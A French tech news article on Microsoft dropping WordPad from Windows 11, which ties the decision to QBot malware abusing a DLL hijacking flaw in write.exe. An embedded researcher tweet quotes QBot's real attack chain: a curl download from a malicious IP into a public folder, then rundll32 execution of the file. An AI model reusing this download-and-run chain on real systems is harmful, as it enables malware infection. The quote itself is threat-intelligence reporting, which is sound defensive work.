Microsoft a commencé à supprimer WordPad de Windows et a retiré l’éditeur de la première build Windows 11 du canal Canary de 2024. Nous savions que cela allait arriver et cette échéance est désormais matérialisée dans le canal Canary. Une installation propre omettra WordPad à partir du build 26020 de Windows 11. Microsoft a indiqué que « dans une prochaine mise à niveau », WordPad sera supprimé et ne pourra pas être réinstallé. L'entreprise n'a cependant pas précisé quand. Il y a aussi des spéculations selon lesquelles WordPad posait un risque de sécurité. Plus tôt l’année dernière, certains ordinateurs fonctionnant sous Windows ont été infectés par le logiciel malveillant Qbot, qui a échappé à la détection en exploitant une faille de détournement dans l’application WordPad pour Windows 10.
WordPad est un logiciel de traitement de texte de base qui est inclus dans toutes les versions de Windows à partir de 95, dont la première version est sortie le 24 août 1995.
Il permet une mise en forme basique et l’impression. Il ne comprend ni correcteur orthographique ni gestion des styles. Il est bon pour écrire des lettres ou des textes courts mais n’est pas assez puissant pour de nombreuses tâches ou pour rédiger de longs rapports avec des graphiques ou de longs textes, tels des thèses ou des livres.
En septembre 2023, Microsoft a annoncé que WordPad ne recevra plus de mises à jour et sera retiré des futures versions de Windows. L'entreprise a recommandé l'utilisation du Bloc-notes pour l'édition des fichiers en texte brut (l'application a récemment été dotée d'une interface à onglets et d'une fonction d'enregistrement automatique des sessions), et de Microsoft Word pour les documents contenant du texte enrichi (comme les fichiers .rtf ou .docx). Microsoft Word est disponible gratuitement sur le web ou en tant qu'application autonome dans l'abonnement Microsoft 365.
Dans une note de version annonçant la disponibilité de Windows 11 Insider Preview Build 26020 sur le canal Canary, Microsoft a déclaré :
À partir de cette version, les applications WordPad et People ne seront plus installées après une installation propre du système d'exploitation. Dans un prochain vol, WordPad sera supprimé lors de la mise à jour. WordPad ne pourra pas être réinstallé. WordPad est une fonctionnalité Windows obsolète.
Une faille de sécurité l'année dernière impliquant WordPad
WordPad a été inclus dans chaque version de Windows depuis Windows 95. Il permettait à un utilisateur d’effectuer des modifications de texte de base sans logiciel supplémentaire, avec des capacités telles que pouvoir inclure des images et des liens vers d’autres fichiers, et prenait en charge plusieurs formats de texte populaires. Notons également que WordPad est une fonctionnalité optionnelle de Windows depuis la publication de Windows 10 Insider Build 19551 en février 2020. Même s'il est toujours installé par défaut sur tous les systèmes Windows, il est devenu possible de le désinstaller à l'aide du panneau de configuration « Fonctionnalités optionnelles ».
Certains ont estimé qu'une faille de sécurité impliquant WordPad l'année dernière a incité Microsoft à précipiter la retraite de son application.
QBot, également connu sous le nom de Qakbot, est un logiciel malveillant pour Windows qui, au départ, était un cheval de Troie bancaire, mais qui a évolué pour devenir un dropper de logiciels malveillants. Des cybercriminels utilisant des ransomware, dont Black Basta, Egregor et Prolock, se sont associés à l'opération de malware pour obtenir un accès initial aux réseaux d'entreprise afin de mener des attaques d'extorsion.
ProxyLife, chercheur en sécurité et membre de Cryptolaemus, a déclaré début 2023 qu'une nouvelle campagne de phishing de QBot a commencé à exploiter une vulnérabilité de détournement de DLL dans l'exécutable WordPad de Windows 10, write.exe. Le programme malveillant QBot a commencé à exploiter la faille pour infecter des ordinateurs, en utilisant le programme légitime pour éviter d'être détecté par les logiciels de sécurité.
Une DLL est un fichier de bibliothèque contenant des fonctions qui peuvent être utilisées par plusieurs programmes en même temps. Lorsqu'une application est lancée, elle tente de charger toutes les DLL nécessaires.
Pour ce faire, elle recherche la DLL dans des dossiers Windows spécifiques et, lorsqu'elle la trouve, la charge. Toutefois, les applications Windows donnent la priorité aux DLL qui se trouvent dans le même dossier que l'exécutable et les chargent avant toutes les autres.
On parle de détournement de DLL lorsqu'un acteur de la menace crée une DLL malveillante portant le même nom qu'une DLL légitime et la place dans le chemin de recherche initial de Windows, généralement dans le même dossier que l'exécutable. Lorsque cet exécutable est lancé, il charge la DLL malveillante plutôt que la DLL légitime et exécute les commandes malveillantes qu'elle contient.
Donc, malgré la nostalgie pour le logiciel, il vaut peut-être mieux que Microsoft le supprime effectivement.
[TWITTER]<blockquote class="twitter-tweet"><p lang="en" dir="ltr"><a href="https://twitter.com/hashtag/Qakbot?src=hash&ref_src=twsrc%5Etfw">#Qakbot</a> - BB28 - url > .zip > .exe > .dll > .curl > .dll<br><br>T1574 - DLL Search Order Hijacking<br><br>write.exe - "Microsoft Write"<br><br>curl http://109.172.45.]9/Leq/15 -o c:\users\public\default.png<br><br>rundll32 c:\users\public\default.png,print<br><br>IOC's<a href="https://t.co/biu1RfccFs">https://t.co/biu1RfccFs</a> <a href="https://t.co/NrBWsOb4qW">https://t.co/NrBWsOb4qW</a> <a href="https://t.co/rsIGGnwQb3">pic.twitter.com/rsIGGnwQb3</a></p>— Cryptolaemus (@Cryptolaemus1) <a href="https://twitter.com/Cryptolaemus1/status/1658152178945601549?ref_src=twsrc%5Etfw">May 15, 2023</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> [/TWITTER]
Plusieurs alternatives sont disponibles
Celles de Microsoft
Il existe de nombreuses alternatives disponibles, mais Microsoft a ses propres recommandations. La première est celle dont vous êtes probablement déjà familier : Microsoft Word. Vous pouvez utiliser Microsoft Word en ligne gratuitement avec un compte Outlook. Vous pouvez ensuite vous connecter à Microsoft 365 en ligne, accédant ainsi à la suite d’applications Office basées sur le cloud de Microsoft, notamment Word, Excel et PowerPoint. Vous pouvez également télécharger Word en tant qu’application autonome avec un abonnement Microsoft 365, mais ce n’est pas gratuit.
Sa deuxième recommandation est un autre éditeur de texte de base qui fait partie de Windows depuis des années : le Bloc-notes. Il est principalement destiné aux documents en texte brut, tels que les fichiers .txt. Alors que WordPad est abandonné, le Bloc-notes continue de voir des mises à jour de ses fonctionnalités. Vous pouvez désormais...
La fin de cet article est réservée aux abonnés. Soutenez le Club Developpez.com en prenant un abonnement pour que nous puissions continuer à vous proposer des publications.
Que pensez-vous de la décision de Microsoft de supprimer WordPad de Windows ? La faille de sécurité de WordPad l'année dernière est-elle susceptible d'avoir influencé la décision de Microsoft selon vous ? Pourquoi ?
